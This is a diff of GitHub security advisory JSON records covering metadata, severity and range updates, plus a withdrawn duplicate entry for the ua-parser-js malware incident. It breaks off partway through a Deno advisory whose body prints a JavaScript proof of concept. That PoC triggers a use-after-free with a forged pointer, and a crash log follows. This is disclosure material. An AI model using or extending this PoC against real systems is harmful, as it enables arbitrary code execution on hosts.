diff --git a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json index 1c32e88eef1cb..a20e6bc61de8e 100644 --- a/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json +++ b/advisories/github-reviewed/2021/03/GHSA-5mg8-w23w-74h3/GHSA-5mg8-w23w-74h3.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-5mg8-w23w-74h3", - "modified": "2023-08-18T15:56:36Z", + "modified": "2026-02-23T22:45:53Z", "published": "2021-03-25T17:04:19Z", "aliases": [ "CVE-2020-8908" ], "summary": "Information Disclosure in Guava", - "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n", + "details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json index 9ef5757001b98..b1da087ffa98d 100644 --- a/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json +++ b/advisories/github-reviewed/2021/10/GHSA-pjwm-rvh2-c87w/GHSA-pjwm-rvh2-c87w.json @@ -1,9 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-pjwm-rvh2-c87w", - "modified": "2023-07-28T15:38:48Z", + "modified": "2026-02-17T21:57:43Z", "published": "2021-10-22T20:38:14Z", - "aliases": [], + "aliases": [ + "CVE-2021-4229" + ], "summary": "Embedded malware in ua-parser-js", "details": "The npm package `ua-parser-js` had three versions published with malicious code. Users of affected versions (0.7.29, 0.8.0, 1.0.0) should upgrade as soon as possible and check their systems for suspicious activity. See [this issue](https://github.com/faisalman/ua-parser-js/issues/536) for details as they unfold.\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": [ diff --git a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json index 6386bf81eb90a..fb54a9073e854 100644 --- a/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json +++ b/advisories/github-reviewed/2022/02/GHSA-8v38-pw62-9cw2/GHSA-8v38-pw62-9cw2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8v38-pw62-9cw2", - "modified": "2025-12-20T03:15:43Z", + "modified": "2026-02-20T19:56:16Z", "published": "2022-02-18T00:00:33Z", "aliases": [ "CVE-2022-0639" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.0.0" }, { "fixed": "1.5.7" diff --git a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json index 90fa858d67a89..efd0a189e3e1a 100644 --- a/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json +++ b/advisories/github-reviewed/2022/02/GHSA-rqff-837h-mm52/GHSA-rqff-837h-mm52.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rqff-837h-mm52", - "modified": "2022-02-24T14:00:06Z", + "modified": "2026-02-20T19:56:07Z", "published": "2022-02-15T00:02:46Z", "aliases": [ "CVE-2022-0512" @@ -25,7 +25,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "0.1.0" }, { "fixed": "1.5.6" diff --git a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json index eaad37ba99926..d4b0769563ba5 100644 --- a/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json +++ b/advisories/github-reviewed/2022/04/GHSA-gx7g-wjxg-jwwj/GHSA-gx7g-wjxg-jwwj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gx7g-wjxg-jwwj", - "modified": "2022-04-18T22:17:42Z", + "modified": "2026-02-18T23:33:34Z", "published": "2022-04-04T00:00:55Z", "aliases": [ "CVE-2022-0088" @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://github.com/yourls/yourls/commit/1de256d8694b0ec7d4df2ac1d5976d4055e09d59" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-0088.md" + }, { "type": "PACKAGE", "url": "https://github.com/yourls/yourls" diff --git a/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json new file mode 100644 index 0000000000000..5e254e659881b --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-236c-vhj4-gfxg/GHSA-236c-vhj4-gfxg.json @@ -0,0 +1,112 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-236c-vhj4-gfxg", + "modified": "2026-02-17T21:40:20Z", + "published": "2022-05-25T00:00:31Z", + "withdrawn": "2026-02-17T21:40:20Z", + "aliases": [], + "summary": "Duplicate Advisory: Embedded malware in ua-parser-js", + "details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-pjwm-rvh2-c87w. This link is maintained to preserve external references.\n\n### Original Description\nA vulnerability was found in ua-parser-js 0.7.29/0.8.0/1.0.0. It has been rated as critical. This issue affects the crypto mining component which introduces a backdoor. Upgrading to version 0.7.30, 0.8.1 and 1.0.1 is able to address this issue. It is recommended to upgrade the affected component.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.7.29" + }, + { + "fixed": "0.7.30" + } + ] + } + ], + "versions": [ + "0.7.29" + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.8.0" + }, + { + "fixed": "0.8.1" + } + ] + } + ], + "versions": [ + "0.8.0" + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "ua-parser-js" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "fixed": "1.0.1" + } + ] + } + ], + "versions": [ + "1.0.0" + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4229" + }, + { + "type": "WEB", + "url": "https://github.com/faisalman/ua-parser-js/issues/536" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-pjwm-rvh2-c87w" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.185453" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-829", + "CWE-912" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-17T21:40:20Z", + "nvd_published_at": "2022-05-24T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json index d452d221466e0..2950526f06122 100644 --- a/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json +++ b/advisories/github-reviewed/2022/10/GHSA-mg5h-rhjq-6v84/GHSA-mg5h-rhjq-6v84.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mg5h-rhjq-6v84", - "modified": "2022-11-01T20:35:47Z", + "modified": "2026-02-18T23:33:51Z", "published": "2022-10-31T12:00:18Z", "aliases": [ "CVE-2022-3766" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/thorsten/phpmyfaq/commit/c7904f2236c6c0dd64c2226b90c30af0f7e5a72d" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-3766.md" + }, { "type": "PACKAGE", "url": "https://github.com/thorsten/phpmyfaq" diff --git a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json index 3becc89af6f0e..38c97bebed5e5 100644 --- a/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json +++ b/advisories/github-reviewed/2022/12/GHSA-cp9c-phxx-55xm/GHSA-cp9c-phxx-55xm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cp9c-phxx-55xm", - "modified": "2022-12-12T22:08:01Z", + "modified": "2026-02-18T23:34:01Z", "published": "2022-12-11T15:30:45Z", "aliases": [ "CVE-2022-4407" @@ -44,6 +44,10 @@ "type": "WEB", "url": "https://github.com/thorsten/phpmyfaq/commit/1d73af34bf42764f9f9491c7ba5e9495d70e3ca5" }, + { + "type": "WEB", + "url": "https://github.com/MarkLee131/awesome-web-pocs/blob/main/CVE-2022-4407.md" + }, { "type": "PACKAGE", "url": "https://github.com/thorsten/phpmyfaq" diff --git a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json index 8d3278ddb2d50..f6754d1003fb4 100644 --- a/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json +++ b/advisories/github-reviewed/2023/01/GHSA-qjm7-55vv-3c5f/GHSA-qjm7-55vv-3c5f.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-qjm7-55vv-3c5f", - "modified": "2023-01-20T23:35:16Z", + "modified": "2026-02-17T22:04:14Z", "published": "2023-01-18T03:31:17Z", "aliases": [ "CVE-2018-25077" ], "summary": "mel-spintax has Inefficient Regular Expression Complexity", "details": "A vulnerability was found in melnaron mel-spintax. It has been rated as problematic. Affected by this issue is some unknown functionality of the file `lib/spintax.js`. The manipulation of the argument text leads to inefficient regular expression complexity. The name of the patch is 37767617846e27b87b63004e30216e8f919637d3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-218456.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json index f9e33a67fda75..852c72f7cbb42 100644 --- a/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json +++ b/advisories/github-reviewed/2023/01/GHSA-vm74-j4wq-82xj/GHSA-vm74-j4wq-82xj.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-vm74-j4wq-82xj", - "modified": "2024-03-01T14:28:55Z", + "modified": "2026-02-17T22:04:50Z", "published": "2023-01-17T21:30:22Z", "aliases": [ "CVE-2022-4891" ], "summary": "Sisimai Inefficient Regular Expression Complexity vulnerability", "details": "A vulnerability has been found in Sisimai up to 4.25.14p11 and classified as problematic. This vulnerability affects the function `to_plain` of the file `lib/sisimai/string.rb`. The manipulation leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. Upgrading to version 4.25.14p12 is able to address this issue. The name of the patch is 51fe2e6521c9c02b421b383943dc9e4bbbe65d4e. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218452.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], "affected": [ { "package": { diff --git a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json index 3ef93a9f6af83..5f7a7b4f87119 100644 --- a/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json +++ b/advisories/github-reviewed/2024/02/GHSA-g74q-5xw3-j7q9/GHSA-g74q-5xw3-j7q9.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-g74q-5xw3-j7q9", - "modified": "2024-03-19T18:00:01Z", + "modified": "2026-02-17T22:01:33Z", "published": "2024-02-13T19:49:43Z", "aliases": [ "CVE-2024-21386" ], "summary": "Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability", "details": "# Microsoft Security Advisory CVE-2024-21386: .NET Denial of Service Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in ASP.NET 6.0, ASP.NET 7.0 and, ASP.NET 8.0 . This advisory also provides guidance on what developers can do to update their applications to address this vulnerability.\n\nA vulnerability exists in ASP.NET applications using SignalR where a malicious client can result in a denial-of-service.\n\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/295\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 6.0 application running on .NET 6.0.26 or earlier.\n* Any .NET 7.0 application running on .NET 7.0.15 or earlier.\n* Any .NET 8.0 application running on .NET 8.0.1 or earlier.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET Core project if it uses any of affected packages versions listed below\n\n### ASP.NET 6.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 6.0.26 | 6.0.27\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 6.0.26 | 6.0.27\n\n\n\n### ASP.NET 7.0\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 7.0.15 | 7.0.16\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 7.0.15 | 7.0.16\n\n### ASP.NET 8.0\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.AspNetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-musl-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.linux-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.osx-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | <= 8.0.1 | 8.0.2\n[Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | <= 8.0.1 | 8.0.2\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software) or [affected packages](#affected-packages) , you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 8.0 or .NET 7.0 or .NET 6.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.200\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.200 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspNetCore.App]\n Microsoft.NETCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App]\n Microsoft.WindowsDesktop.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.WindowsDesktop.App]\n\nTo install additional .NET Core runtimes or SDKs:\n https://aka.ms/dotnet-download\n```\n\n* If you're using .NET 8.0, you should download and install .NET 8.0.2 Runtime or .NET 8.0.102 SDK (for Visual Studio 2022 v17.8) from https://dotnet.microsoft.com/download/dotnet-core/8.0.\n* If you're using .NET 7.0, you should download and install Runtime 7.0.16 or SDK 7.0.116 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.\n* If you're using .NET 6.0, you should download and install Runtime 6.0.27 or SDK 6.0.419 from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n.NET 6.0, .NET 7.0 and, .NET 8.0 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.\n\nOnce you have installed the updated runtime or SDK, restart your apps for the update to take effect.\n\nAdditionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.\n\n## Other Information\n\n### Reporting Security Issues\n\nIf you have found a potential security issue in .NET 8.0 or .NET 7.0 or .NET 6.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at .\n\n### Support\n\nYou can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue.\n\n### Disclaimer\n\nThe information provided in this advisory is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\n\n### External Links\n\n[CVE-2024-21386]( https://www.cve.org/CVERecord?id=CVE-2024-21386)\n\n### Revisions\n\nV1.0 (February 13, 2024): Advisory published.\n\n_Version 1.0_\n\n_Last Updated 2024-02-13_", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [ { "package": { @@ -822,8 +827,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "CRITICAL", + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-02-13T19:49:43Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json index 7b894d7fc37d8..08bb6b80dafb3 100644 --- a/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json +++ b/advisories/github-reviewed/2024/03/GHSA-3j27-563v-28wf/GHSA-3j27-563v-28wf.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-3j27-563v-28wf", - "modified": "2024-03-06T17:04:40Z", + "modified": "2026-02-17T19:38:52Z", "published": "2024-03-06T17:04:29Z", "aliases": [ "CVE-2024-27934" ], "summary": "*const c_void / ExternalPointer unsoundness leading to use-after-free", - "details": "### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis 